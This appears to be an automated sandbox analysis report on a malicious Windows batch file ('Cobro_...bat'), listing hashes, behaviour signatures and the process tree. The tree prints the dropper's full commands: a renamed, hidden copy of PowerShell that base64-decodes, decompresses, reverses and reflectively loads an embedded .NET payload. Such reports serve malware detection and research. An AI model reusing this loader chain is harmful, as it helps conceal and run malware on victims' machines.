Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
03-10-2024 04:39
Static task
static1
Behavioral task
behavioral1
Sample
Cobro_876634226701191038128011582367096095686646340584195296708193218.bat
Resource
win7-20240903-en
General
-
Target
Cobro_876634226701191038128011582367096095686646340584195296708193218.bat
-
Size
1.8MB
-
MD5
1698e898da21c028d3bfc61cbf0904aa
-
SHA1
acd1043cec76eacee19eb78b37b4a0624bc350f3
-
SHA256
075e65d20779e5ffdbe58f96c3639d6a6db830c41e100e68e0d45361ee2cc099
-
SHA512
466baec151eb73eeebe4b92a15b0046035019d19da9a7236d5d5e409ed61dd95469aed729eeb37eaab0bf905d5360bffd0b83975c3f5709888e10dd4ff401f61
-
SSDEEP
24576:Gyc27ntMASfw1Tr0s3OoF3A+HcA0uuSpYFIgu9k/gnJyi2QvqxspBVskiXLf5:dtwQYs+M3N8A0ud79yS92QvqNt
Malware Config
Signatures
-
Sets file to hidden 1 TTPs 1 IoCs
Modifies file attributes to stop it showing in Explorer etc.
pid Process 2824 attrib.exe -
Executes dropped EXE 1 IoCs
pid Process 2712 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2712 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2712 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2712 Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -
Suspicious use of WriteProcessMemory 16 IoCs
description pid Process procid_target PID 2668 wrote to memory of 2716 2668 cmd.exe 32 PID 2668 wrote to memory of 2716 2668 cmd.exe 32 PID 2668 wrote to memory of 2716 2668 cmd.exe 32 PID 2668 wrote to memory of 2764 2668 cmd.exe 33 PID 2668 wrote to memory of 2764 2668 cmd.exe 33 PID 2668 wrote to memory of 2764 2668 cmd.exe 33 PID 2668 wrote to memory of 2768 2668 cmd.exe 34 PID 2668 wrote to memory of 2768 2668 cmd.exe 34 PID 2668 wrote to memory of 2768 2668 cmd.exe 34 PID 2668 wrote to memory of 2824 2668 cmd.exe 35 PID 2668 wrote to memory of 2824 2668 cmd.exe 35 PID 2668 wrote to memory of 2824 2668 cmd.exe 35 PID 2668 wrote to memory of 2712 2668 cmd.exe 36 PID 2668 wrote to memory of 2712 2668 cmd.exe 36 PID 2668 wrote to memory of 2712 2668 cmd.exe 36 PID 2668 wrote to memory of 2712 2668 cmd.exe 36 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2824 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\chcp.comchcp 650012⤵PID:2716
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo F "2⤵PID:2764
-
-
C:\Windows\system32\xcopy.exexcopy /d /q /y /h /i C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow2⤵PID:2768
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2824
-
-
C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.JowC:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow -WindowStyle hidden -command "$Amwfvap = get-content 'C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat' | Select-Object -Last 1; $Lahapqm = [System.Convert]::FromBase64String($Amwfvap);$Wmhuprvc = New-Object System.IO.MemoryStream( , $Lahapqm );$Swwilmyw = New-Object System.IO.MemoryStream;$Haozxiw = New-Object System.IO.Compression.GzipStream $Wmhuprvc, ([IO.Compression.CompressionMode]::Decompress);$Haozxiw.CopyTo( $Swwilmyw );$Haozxiw.Close();$Wmhuprvc.Close();[byte[]] $Lahapqm = $Swwilmyw.ToArray();[Array]::Reverse($Lahapqm); $Uzzzux = [System.AppDomain]::CurrentDomain.Load($Lahapqm); $Xtqfmtdiwhr = $Uzzzux.EntryPoint; [System.Delegate]::CreateDelegate([Action], $Xtqfmtdiwhr.DeclaringType, $Xtqfmtdiwhr.Name).DynamicInvoke() | Out-Null"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Cobro_876634226701191038128011582367096095686646340584195296708193218.bat.Jow
Filesize442KB
MD592f44e405db16ac55d97e3bfe3b132fa
SHA104c5d2b4da9a0f3fa8a45702d4256cee42d8c48d
SHA2566c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7
SHA512f7d85cfb42a4d859d10f1f06f663252be50b329fcf78a05bb75a263b55235bbf8adb89d732935b1325aaea848d0311ab283ffe72b19db93e6c28a859204fdf9f